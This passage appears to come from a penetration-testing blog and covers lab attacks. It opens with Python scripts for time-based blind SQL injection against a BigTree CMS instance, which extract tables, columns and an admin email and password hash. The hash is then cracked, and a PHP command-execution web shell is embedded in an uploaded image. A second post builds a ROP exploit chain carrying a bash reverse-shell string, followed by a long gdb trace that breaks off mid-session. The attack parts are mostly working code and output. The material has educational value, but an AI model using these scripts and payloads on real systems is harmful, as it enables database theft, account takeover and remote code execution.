              .format(requesturl)
        t = timeit.Timer("opener.open(u)", command)
        if t.timeit(number=1)>3.0:
            check = True
            sys.stdout.write(c)
            break

    if not check:
        break

print ''

This is almost the same as the last script except I'm using GROUP_CONCAT to concatenate all the records and I'm excluding the bigtree_404s table.

Running it you get:

1
2
3
4
5
6
7
8
9
C:\Users\User>python "D:\vms\PentesterAcademy\SQL Injection\BigTree-CMS-tables.py"
bigtree_audit_trail | bigtree_callouts | bigtree_feeds | bigtree_field_types | b
igtree_locks | bigtree_messages | bigtree_module_actions | bigtree_module_forms
| bigtree_module_groups | bigtree_module_view_cache | bigtree_module_views | big
tree_modules | bigtree_page_revisions | bigtree_pages | bigtree_pending_changes
| bigtree_resource_folders | bigtree_resources | bigtree_route_history | bigtree
_settings | bigtree_tags | bigtree_tags_rel | bigtree_templates | bigtree_users
| btx_dogwood_authors | btx_dogwood_categories | btx_dogwood_post_categories | b
tx_dogwood_posts | sample_features | sample_glossary

Obviously the table of most interest to us here is bigtree_users, now we need to figure out the column names:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
#!/usr/bin/env python

import urllib2
import sys
import string
import timeit

max = 0
charset = string.printable

if len(sys.argv) < 2:
    max = 50000
else:
    max = int(sys.argv[1])

for i in xrange(max):
    check = False
    for c in charset:
        requesturl = "http://sqli/BigTree-CMS/site/index.php/admin%27%20" \
                 "union%20select%20null,null,case%20when%20ascii%28substr" \
                 "%28%28select%20group_concat%28column_name%20separator%20" \
                 "%27%20|%20%27%29%20from%20information_schema.columns%20" \
                 "where%20table_name=%27bigtree_users%27%29,{0},1%29%29=" \
                 "{1}%20then%20sleep(3)%20else%201%20end%20--%20/acid/" \
                 .format(str(i+1), str(ord(c)))
        command = "import urllib2;u=\"{0}\";" \
                          "proxy=urllib2.ProxyHandler({'http': '127.0.0.1:8080'});" \
                          "opener=urllib2.build_opener(proxy);" \
                          "opener.addheaders=[('User-agent', 'Mozilla/5.0 (Windows NT 6.3; WOW64;" \
                          " rv:35.0) Gecko/20100101 Firefox/35.0')," \
                          " ('Accept', 'text/html'), ('Accept-Language', 'en_US,en;q=0.5')]"
              .format(requesturl)
        t = timeit.Timer("opener.open(u)", command)
        if t.timeit(number=1)>3.0:
            check = True
            sys.stdout.write(c)
            break

    if not check:
        break

print ''

Again this is very similar to the last 2 script, except now we are looking at the columns table of the information_schema database.

Running this you get:

1
2
3
C:\Users\User>python "D:\vms\PentesterAcademy\SQL Injection\BigTree-CMS-columns.py"
id | email | password | name | company | level | permissions | alerts | daily_di
gest | change_password_hash

Now we have enough information to get the account details, I've chosen a few interesting columns to print:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
#!/usr/bin/env python

import urllib2
import sys
import string
import timeit

max = 0
charset = string.printable

if len(sys.argv) < 2:
    max = 50000
else:
    max = int(sys.argv[1])

for i in xrange(max):
    check = False
    for c in charset:
        requesturl = "http://sqli/BigTree-CMS/site/index.php/admin%27%20" \
                 "union%20select%20null,null,case%20when%20ascii%28substr" \
                 "%28%28select%20group_concat%28concat%28email,%27%20:%20" \
                 "%27,password,%27%20:%20%27,name,%27%20:%20%27,level,%27" \
                 "%20:%20%27,permissions%29%20separator%20%27%20|%20%27%29" \
                 "%20from%20bigtree.bigtree_users%29,{0},1%29" \
                 "%29={1}%20then%20sleep(3)%20else%201%20" \
                 "end%20--%20/acid/" \
                 .format(str(i+1), str(ord(c)))
        command = "import urllib2;u=\"{0}\";" \
                          "proxy=urllib2.ProxyHandler({'http': '127.0.0.1:8080'});" \
                          "opener=urllib2.build_opener(proxy);" \
                          "opener.addheaders=[('User-agent', 'Mozilla/5.0 (Windows NT 6.3; WOW64;" \
                          " rv:35.0) Gecko/20100101 Firefox/35.0')," \
                          " ('Accept', 'text/html'), ('Accept-Language', 'en_US,en;q=0.5')]"
              .format(requesturl)
        t = timeit.Timer("opener.open(u)", command)
        if t.timeit(number=1)>3.0:
            check = True
            sys.stdout.write(c)
            break

    if not check:
        break

print ''

Running this we get:

1
2
C:\Users\User>python "D:\vms\PentesterAcademy\SQL Injection\BigTree-CMS-accounts.py"
[email protected] : $P$BnOySvzal3k5W.2/zBqAQWF1.PFOZy0 : Developer : 2 :

Cracking The Hash

So we have the details for 1 user account (the admin account in this case), now we should try to crack it.

For this I'll use john the ripper.

Let's try just a normal brute force for a while and if that takes too long we'll try a dictionary attack or something:

1
2
3
4
5
6
7
root@kali:~# cat pwhash 
[email protected]:$P$BnOySvzal3k5W.2/zBqAQWF1.PFOZy0
root@kali:~# john pwhash 
Loaded 1 password hash (phpass MD5 [128/128 SSE2 intrinsics 4x4x3])
123321           ([email protected])
guesses: 1  time: 0:00:00:04 DONE (Thu Mar  5 16:28:41 2015)  c/s: 2826  trying: trident - 88888888
Use the "--show" option to display all of the cracked passwords reliably

Luckily this was a very insecure password and the hash was cracked very quickly using a brute force (this is another security issue, allowing weak passwords).

Some More Poking About

After logging in as the [email protected] user, you should see this:

Clicking around there are a number of interesting things, like a stored XSS in the footer social links, so by creating a footer link like this:

And while it doesn't run when viewed in the admin panel (bare in mind that the subtitle field is likely vulnerable too to make this less obvious):

When any normal page is visited, the attack is run:

And looking at this response in burp, we can see where our attack payload is put:

But, more interestingly, in Modules -> Features -> Add Feature I have the ability to upload pictures:

Unrestricted File Upload Vulnerability

So, first I just upload a normal image file.

For this I'm going to use this image (credits to Majonez who created it).

I just saved it with the filename one.jpg, select it in the form, put the title as one, click Save & Publish and I get this:

Its asking to crop the image, which probably means there is some sort of analysis done on the image.

Full Path Disclosure

At this point I decided to try to upload a plain PHP backdoor, so I clicked on the View Features button and was presented with this:

Obviously because I started uploading the image it created the feature but as I didn't crop it it hasn't finished creating the feature, this is a logic flaw in the application which may or may not lead to a security vulnerability.

Let's look at this feature:

So the logic flaw lead to a full path disclosure vulnerability, really the developers should have waited until all of the steps of creating the feature had completed before creating the feature, discarding any half created features after a timeout, also this error should be caught and dealt with gracefully.

Back To The File Upload

Anyway, we can continue by trying to upload the following PHP file:

1
<?php echo system($_GET['cmd']); ?>

This is just a very simple PHP backdoor which will take an input in the cmd argument of a query string of a GET request.

Trying to upload the file in the same manner as I did the image, I get:

The image size is 1 issue but it also says that it isn't an image file, this could just be a content type check or it could also check the file extension.

Hopefully we can beat both of these checks by using a real image but chaning the file extension to .php.

Firstly I will change the size to 1400x625, which is the size it wanted to crop the image to, I done this in GIMP in Image -> Scale Image...:

I saved this to two.jpg, renamed it to two.php and attempted the upload again:

So its uploaded successfully!

Right clicking on the new image and clicking Copy Image Location gives us the following url:

http://[ip]/BigTree-CMS/site/files/features/t_two.php

In that folder there is currently the following files:

Obviously, these will not work as PHP files yet because they contain no actual PHP code, we will sort that out in a minute, but we can see that both two.php and xlrg_two.php is very likely our original file, whereas t_two.php is a different version created by the application.

So I added some PHP code into the comments section of the image, using GIMP again, going to File -> Export..., putting three.jpg as the name and clicking Export:

Again, change the file extension from .jpg to .php and do the upload.

After, visit the following url to see if it has worked:

http://[ip]/BigTree-CMS/site/files/features/three.php?cmd=cat%20/etc/passwd

Obviously that didn't work :-(

After, a lot of trial and error, I decided to try search for other instances of <? (the opening of PHP code in PHP files) using the hex editor HxD:

There were 2 other instances (apart from the 1 in the commands section which contains my PHP code), here is the comment section in HxD:

I changed one of the values so that there were no other instances and tried again:

Clearly it didn't work, but at least now its not producing an error (its returning the actual content of the file instead of nothing which means those 2 extra <? where a problem).

I thought that maybe the application was stripping the comment section, so I used HxD again to insert my PHP code directly into the middle of the actual image:

Trying this file, gives us:

I now have the ability to run OS commands on the webserver.

PWNED!!! :-D

Conclusion

I think this post illustrates the different steps that might be involved in a full attack against a web application.

As you can see, there could be many vulnerabilities involved (I found at least 6 vulnerabilities in this application), each getting you closer and closer to the ultimate goal of RCE (remote code execution).

There will always be a reasonable level of trial and error when figuring out how to exploit most vulnerabilities, in all of the simplist cases, so a lot of patience is required to be successful!

Happy Hacking :-)

Further Reading

The Web Application Hackers Handbook by Dafydd Stuttard and Marcus Pinto (Here is the website that accompanies the book)

OWASP Testing Guide which can be viewed online or downloaded from here.

SQL Injection Attacks and Defense by Justin Clarke

Pentester Academy by Vivek Ramachandran has a number of relevant courses (WAP, Challenges and Python)

Improving The ROP Exploit

So after the last post I kept thinking of ways that I could improve the exploit so I decided to do it.

If you haven't already read the last post on developing a ROP exploit, you should read that before this because I will not cover anything that I covered there and it is just a continuation of that. You can read it here.

As with any exploit development the main point of interest for improvement is reducing the size of the payload so this is where I will focus.

You can think about obfuscation and such in certain exploitations but when ROP is required obfuscation isn't really an option.

Why/How ROP Works

In the last post I didn't really go into much detail about why or how ROP actually works because the post was already pretty long but I thought I'd go into it a bit here.

In my post titled Basic Binary Auditing, in the section called Stack Frames I explain how function calls and returns work.

The important part of that in terms of ROP is how the function returns. A stack-based buffer overflow exploit is initiated when the vulnerable function returns.

This is because the return address that is stored on the stack is pop'ed off of the stack into eip (the instruction pointer).

This happens because when a function is returning it has no way of knowing where in the application code to continue executing.

Because of this the address that execution should return to after the function is finished is pushed onto the stack when the function is called so that it can be retrieved when its finished.

If you find a stack-based buffer overflow and you are able to send enough data to overwrite this address you can change the flow of execution and point eip wherever you want.

With ROP, understanding this concept is paramount to success. What you are doing is creating your own stack (the same as with return to libc).

The only difference between ROP and return to libc is that instead of "calling" actual library functions you are "calling" snipets of code that resemble the end of a function (a few instructions and then a return), which are called gadgets.

By inserting a bunch of gadgets 1 after another on the stack (chaining) you are controlling the execution flow of the application and with enough gadgets you can build a suitibly large application to do whatever you want.

If you understand this it becomes obvious that esp (the stack pointer) has now become your new eip.

By changing the value of esp you can actually create a new stack elsewhere, this becomes useful for various reasons, eg. if you are constraint for space on the stack (as with in kernel mode) you can allocate space on the heap insert your stack there and change esp to point to your new stack.

I will use this method in this exploit for making ROP function calls and explain how you can use this to make ROP conditional statements.

Moving The Data Section

Back to our exploit.

If you remember we put the data section of our payload at the end but we have 532 A's that we are sending in order to overflow the buffer.

The best way to reduce the size of our exploit to to make as much use of this section at the start as possible.

So we will now move the data section to the start.

I mentioned in the last post that using ////bin/bash instead of /bin/bash wasn't technically needed and was a bit of a waste of space but as we are moving this section to the padding section, which always has to be a fixed 532 bytes, we can leave it as is for now.

If we actually use the whole 532 bytes of this section I will make some changes here to reduce its size but as it is it makes calculations slightly easier.

A ROP Function

IMO, the most exciting part of this new exploit will be the implementation of a "function call".

In the last exploit we were using the same series of gadgets throughout the exploit to calculate addresses.

In a normal application we'd use a function for this, so I thought why shouldn't we here, looking through the avaliable gadgets I created this to do our address calculations:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
0x080a3f72 : xchg eax, edi ; ret
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x08099c0f : xor eax, eax ; ret
0x0807629e : add eax, ecx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080c0f18 : xchg eax, edi ; xchg eax, esp ; ret

Here the "return address" (the value on the stack that we need to put back into esp at the end) starts off in the eax register.

The function takes 2 "arguments", ecx, which should contain the starting address of the function, and ebx, which should contain the value 0xaaaaaaaa - [distance from the start of the function to the value we want the address of].

As the values we need to calculate are in the data section we want to stick this function below the data section (it could go before but we've have to change the last sub instruction to an add instruction).

The return value of this function is stored in edi when this function is finished.

Based on the gadgets we have avaliable there are 2 different ways, that I have found, we can set up the "call" for this function, the first is this:

1
2
3
0x0808385d : mov eax, ecx ; pop ebx ; pop ebp ; ret
[0xaaaaaaaa - distance from ecx to relevant value]
0xeeeeeeee : junk values to pop

And the second:

1
2
3
0x080a66af : xor eax, eax ; pop ebx ; ret
[0xaaaaaaaa - distance from ecx to relevant value]
0x0807629e : add eax, ecx ; ret

Both of these achieve the same outcome and certainly for our purpose there isn't any difference between the 2.

After 1 of these series of instructions we have the address of the function in eax, so we can call the function with the following gadget:

1
0x0807b086 : xchg eax, esp ; ret

This will put the return address into eax and begin execution at the start of our function.

Once our function returns the return value will be in edi, in our old exploit this value was always put into eax or edx.

We can get this value into eax using this gadget:

1
0x080a3f72 : xchg eax, edi ; ret

And if we want the return value into edx we can use this gadget:

1
0x0809cd4b : mov edx, edi ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret

With this gadget we can put a value straight into ebx setting up ebx for the next function call.

All addresses will now be calculated relative to ecx which should contain the address of the start of the function, therefore this should now be the first problem we approach and the final address of ecx should be set after we've finished with the function.

Testing The Exploit

We want to try to minimize the number of junk values as much as possible too so this should be kept in mind while putting the gadgets together.

At this point you should have notes similar to the following:

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
------------------------strings---------------------
0x2f2f2f2f : ////bin/bash
0x2f6e6962
0x68736162
0xffffffff
--------------------------------------------------
0x632dffff : -c
0xffffffff
--------------------------------------------------
0x6e69622f : /bin/bash -i >& /dev/tcp/127.0.0.1/8000 0>&1
0x7361622f
0x692d2068
0x20263e20
0x7665642f
0x7063742f
0x3732312f
0x302e302e
0x382f312e
0x20303030
0x31263e30
0xffffffff
-------------------------pointers-------------------
0xbbbbbbbb : pointer to ////bin/bash
0xcccccccc : pointer to -c
0xdddddddd : pointer to args
0xffffffff

#################### Function ######################

0x080a3f72 : xchg eax, edi ; ret
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x08099c0f : xor eax, eax ; ret
0x0807629e : add eax, ecx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080c0f18 : xchg eax, edi ; xchg eax, esp ; ret

################### Padding A's ####################

A * (532 - len(payload))

################### Application ####################

0x0807715a : push esp ; mov eax, dword ptr [0x80ccbcc] ; pop ebp ; ret
0x080525d0 : xchg eax, ebp ; ret
0x08057b7e : pop ebx ; ret
0xaaaaa8e6 : 0xaaaaaaaa - 452 (distance to 0xffffffff value in the
       : data just before the function
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x080a8576 : pop eax ; ret
0xaaaaaaaa : value to subtract
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
---------------------------- eax now contains the distance from edx to 
---------------------------- 0xffffffff at the end of the data
0x080535be : push eax ; pop ebx ; pop esi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x0807abcc : mov eax, edx ; ret
0x080748fc : sub eax, ebx ; pop ebx ; pop ebp ; ret
0xaaaaaa96
0xeeeeeeee : junk values to pop
---------------------------- eax now contains the address of 0xffffffff
0x080a820e : mov edx, eax ; pop esi ; mov eax, edx ; pop edi ; pop ebp ; ret
0xeeeeeeee
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x08099c0f : xor eax, eax ; ret
0x08083f21 : mov dword ptr [edx], eax ; ret
0x0807abcc : mov eax, edx ; ret
---------------------------- write nulls over 0xffffffff
0x0804dca2 : mov ecx, eax ; mov eax, dword ptr [eax] ; test eax, eax ; jne 0x804dca1 ; pop ebp ; ret
0xeeeeeeee : junk value to pop
0x080c412b : inc ecx ; ret
0x080c412b : inc ecx ; ret
0x080c412b : inc ecx ; ret
0x080c412b : inc ecx ; ret
---------------------------- ecx now contains the starting address
---------------------------- of the function
0x08099c0f : xor eax, eax ; ret
0x0807629e : add eax, ecx ; ret
0x0807b086 : xchg eax, esp ; ret
0x0809cd4b : mov edx, edi ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0xaaaaaa66 : 0xaaaaaaaa - distance to -c 0xffffffff (68)
0xeeeeeeee
0xeeeeeeee : junk values to pop
0x08099c0f : xor eax, eax ; ret
0x08083f21 : mov dword ptr [edx], eax ; ret
---------------------------- calculate address of long arg 0xffffffff
---------------------------- and write nulls there

Here I'm using the function to calculate the address of the first set of 0xffffffff (to terminate the long argument string) and writing nulls there.

The actual exploit is a very simple python script, as you should know from the first post, so I will only post the full script at the end when we have developed the final exploit.

You can break at the ret of the checkpass function and step through each instruction, here I will break at the function call and ensure that is working as expected:

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
appuser@dev:~$ gdb -q ./app-net
Reading symbols from /home/appuser/app-net...(no debugging symbols found)...done.
(gdb) set disassembly-flavor intel
(gdb) define hook-stop
Type commands for definition of "hook-stop".
End with a line saying just "end".
>x/10xw $esp
>x/i $eip
>end
(gdb) display/x $eax
(gdb) display/x $ebx
(gdb) display/x $ecx
(gdb) display/x $edx
(gdb) display/x $edi
(gdb) display/x $esp
(gdb) break *0x0807629e
Breakpoint 1 at 0x807629e
(gdb) run
Starting program: /home/appuser/app-net 
0xbfffe7c8: 0x0807b086  0x0809cd4b  0xaaaaaa66  0xeeeeeeee
0xbfffe7d8: 0xeeeeeeee  0xeeeeeeee  0x08099c0f  0x08083f21
0xbfffe7e8: 0x08099c00  0x0807629e
=> 0x807629e <compute_offset+46>:   add    eax,ecx

Breakpoint 1, 0x0807629e in compute_offset ()
6: /x $esp = 0xbfffe7c8
5: /x $edi = 0xeeeeeeee
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xaaaaaa96
1: /x $eax = 0x0
(gdb) x/10xw 0xbfffe580
0xbfffe580: 0x080a3f72  0x080a8576  0xaaaaaaaa  0x080748fc
0xbfffe590: 0xeeeeeeee  0xeeeeeeee  0x080535be  0xeeeeeeee
0xbfffe5a0: 0xeeeeeeee  0x08099c0f
(gdb) x/xw 0xbfffe580 - 4
0xbfffe57c: 0x00000000
(gdb) x/xw 0xbfffe580 - 8
0xbfffe578: 0xdddddddd
(gdb) x/xw 0xbfffe580 - 12
0xbfffe574: 0xcccccccc
(gdb) stepi
0xbfffe7c8: 0x0807b086  0x0809cd4b  0xaaaaaa66  0xeeeeeeee
0xbfffe7d8: 0xeeeeeeee  0xeeeeeeee  0x08099c0f  0x08083f21
0xbfffe7e8: 0x08099c00  0x0807629e
=> 0x80762a0 <compute_offset+48>:   ret    
0x080762a0 in compute_offset ()
6: /x $esp = 0xbfffe7c8
5: /x $edi = 0xeeeeeeee
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xaaaaaa96
1: /x $eax = 0xbfffe580
(gdb) stepi
Cannot access memory at address 0xeeeeeef2
(gdb) stepi
0xbfffe580: 0x080a3f72  0x080a8576  0xaaaaaaaa  0x080748fc
0xbfffe590: 0xeeeeeeee  0xeeeeeeee  0x080535be  0xeeeeeeee
0xbfffe5a0: 0xeeeeeeee  0x08099c0f
=> 0x807b087 <intel_check_word+391>:    ret    
0x0807b087 in intel_check_word ()
6: /x $esp = 0xbfffe580
5: /x $edi = 0xeeeeeeee
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xaaaaaa96
1: /x $eax = 0xbfffe7cc
(gdb) stepi
Cannot access memory at address 0xeeeeeef2
(gdb) stepi
0xbfffe584: 0x080a8576  0xaaaaaaaa  0x080748fc  0xeeeeeeee
0xbfffe594: 0xeeeeeeee  0x080535be  0xeeeeeeee  0xeeeeeeee
0xbfffe5a4: 0x08099c0f  0x0807629e
=> 0x80a3f73 <____strtold_l_internal+2499>: ret    
0x080a3f73 in ____strtold_l_internal ()
6: /x $esp = 0xbfffe584
5: /x $edi = 0xbfffe7cc
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xaaaaaa96
1: /x $eax = 0xeeeeeeee
(gdb) stepi
0xbfffe588: 0xaaaaaaaa  0x080748fc  0xeeeeeeee  0xeeeeeeee
0xbfffe598: 0x080535be  0xeeeeeeee  0xeeeeeeee  0x08099c0f
0xbfffe5a8: 0x0807629e  0x080748fc
=> 0x80a8576 <_Unwind_GetDataRelBase+6>:    pop    eax
0x080a8576 in _Unwind_GetDataRelBase ()
6: /x $esp = 0xbfffe588
5: /x $edi = 0xbfffe7cc
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xaaaaaa96
1: /x $eax = 0xeeeeeeee
(gdb) stepi
0xbfffe58c: 0x080748fc  0xeeeeeeee  0xeeeeeeee  0x080535be
0xbfffe59c: 0xeeeeeeee  0xeeeeeeee  0x08099c0f  0x0807629e
0xbfffe5ac: 0x080748fc  0xeeeeeeee
=> 0x80a8577 <_Unwind_GetDataRelBase+7>:    ret    
0x080a8577 in _Unwind_GetDataRelBase ()
6: /x $esp = 0xbfffe58c
5: /x $edi = 0xbfffe7cc
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xaaaaaa96
1: /x $eax = 0xaaaaaaaa
(gdb) stepi
Cannot access memory at address 0xeeeeeef2
(gdb) stepi
0xbfffe590: 0xeeeeeeee  0xeeeeeeee  0x080535be  0xeeeeeeee
0xbfffe5a0: 0xeeeeeeee  0x08099c0f  0x0807629e  0x080748fc
0xbfffe5b0: 0xeeeeeeee  0xeeeeeeee
=> 0x80748fe <strnlen+126>: pop    ebx
0x080748fe in strnlen ()
6: /x $esp = 0xbfffe590
5: /x $edi = 0xbfffe7cc
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xaaaaaa96
1: /x $eax = 0x14
(gdb) stepi
0xbfffe594: 0xeeeeeeee  0x080535be  0xeeeeeeee  0xeeeeeeee
0xbfffe5a4: 0x08099c0f  0x0807629e  0x080748fc  0xeeeeeeee
0xbfffe5b4: 0xeeeeeeee  0x080c0f18
=> 0x80748ff <strnlen+127>: pop    ebp
0x080748ff in strnlen ()
6: /x $esp = 0xbfffe594
5: /x $edi = 0xbfffe7cc
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xeeeeeeee
1: /x $eax = 0x14
(gdb) stepi
0xbfffe598: 0x080535be  0xeeeeeeee  0xeeeeeeee  0x08099c0f
0xbfffe5a8: 0x0807629e  0x080748fc  0xeeeeeeee  0xeeeeeeee
0xbfffe5b8: 0x080c0f18  0x41414141
=> 0x8074900 <strnlen+128>: ret    
0x08074900 in strnlen ()
6: /x $esp = 0xbfffe598
5: /x $edi = 0xbfffe7cc
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xeeeeeeee
1: /x $eax = 0x14
(gdb) stepi
Cannot access memory at address 0xeeeeeef2
(gdb) stepi
0xbfffe598: 0x00000014  0xeeeeeeee  0xeeeeeeee  0x08099c0f
0xbfffe5a8: 0x0807629e  0x080748fc  0xeeeeeeee  0xeeeeeeee
0xbfffe5b8: 0x080c0f18  0x41414141
=> 0x80535bf <malloc_info+239>: pop    ebx
0x080535bf in malloc_info ()
6: /x $esp = 0xbfffe598
5: /x $edi = 0xbfffe7cc
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0xeeeeeeee
1: /x $eax = 0x14
(gdb) stepi
0xbfffe59c: 0xeeeeeeee  0xeeeeeeee  0x08099c0f  0x0807629e
0xbfffe5ac: 0x080748fc  0xeeeeeeee  0xeeeeeeee  0x080c0f18
0xbfffe5bc: 0x41414141  0x41414141
=> 0x80535c0 <malloc_info+240>: pop    esi
0x080535c0 in malloc_info ()
6: /x $esp = 0xbfffe59c
5: /x $edi = 0xbfffe7cc
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0x14
1: /x $eax = 0x14
(gdb) stepi
0xbfffe5a0: 0xeeeeeeee  0x08099c0f  0x0807629e  0x080748fc
0xbfffe5b0: 0xeeeeeeee  0xeeeeeeee  0x080c0f18  0x41414141
0xbfffe5c0: 0x41414141  0x41414141
=> 0x80535c1 <malloc_info+241>: pop    ebp
0x080535c1 in malloc_info ()
6: /x $esp = 0xbfffe5a0
5: /x $edi = 0xbfffe7cc
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0x14
1: /x $eax = 0x14
(gdb) stepi
0xbfffe5a4: 0x08099c0f  0x0807629e  0x080748fc  0xeeeeeeee
0xbfffe5b4: 0xeeeeeeee  0x080c0f18  0x41414141  0x41414141
0xbfffe5c4: 0x41414141  0x41414141
=> 0x80535c2 <malloc_info+242>: ret    
0x080535c2 in malloc_info ()
6: /x $esp = 0xbfffe5a4
5: /x $edi = 0xbfffe7cc
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0x14
1: /x $eax = 0x14
(gdb) stepi
0xbfffe5a8: 0x0807629e  0x080748fc  0xeeeeeeee  0xeeeeeeee
0xbfffe5b8: 0x080c0f18  0x41414141  0x41414141  0x41414141
0xbfffe5c8: 0x41414141  0x41414141
=> 0x8099c0f <strpbrk+175>: xor    eax,eax
0x08099c0f in strpbrk ()
6: /x $esp = 0xbfffe5a8
5: /x $edi = 0xbfffe7cc
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0x14
1: /x $eax = 0x14
(gdb) stepi
0xbfffe5a8: 0x0807629e  0x080748fc  0xeeeeeeee  0xeeeeeeee
0xbfffe5b8: 0x080c0f18  0x41414141  0x41414141  0x41414141
0xbfffe5c8: 0x41414141  0x41414141
=> 0x8099c11 <strpbrk+177>: ret    
0x08099c11 in strpbrk ()
6: /x $esp = 0xbfffe5a8
5: /x $edi = 0xbfffe7cc
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0x14
1: /x $eax = 0x0
(gdb) stepi
0xbfffe5ac: 0x080748fc  0xeeeeeeee  0xeeeeeeee  0x080c0f18
0xbfffe5bc: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffe5cc: 0x41414141  0x41414141
=> 0x807629e <compute_offset+46>:   add    eax,ecx

Breakpoint 1, 0x0807629e in compute_offset ()
6: /x $esp = 0xbfffe5ac
5: /x $edi = 0xbfffe7cc
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0x14
1: /x $eax = 0x0
(gdb) stepi
0xbfffe5ac: 0x080748fc  0xeeeeeeee  0xeeeeeeee  0x080c0f18
0xbfffe5bc: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffe5cc: 0x41414141  0x41414141
=> 0x80762a0 <compute_offset+48>:   ret    
0x080762a0 in compute_offset ()
6: /x $esp = 0xbfffe5ac
5: /x $edi = 0xbfffe7cc
4: /x $edx = 0xbfffe57c
3: /x $ecx = 0xbfffe580
2: /x $ebx = 0x14
1: /x $eax = 0xbfffe580
(gdb) stepi
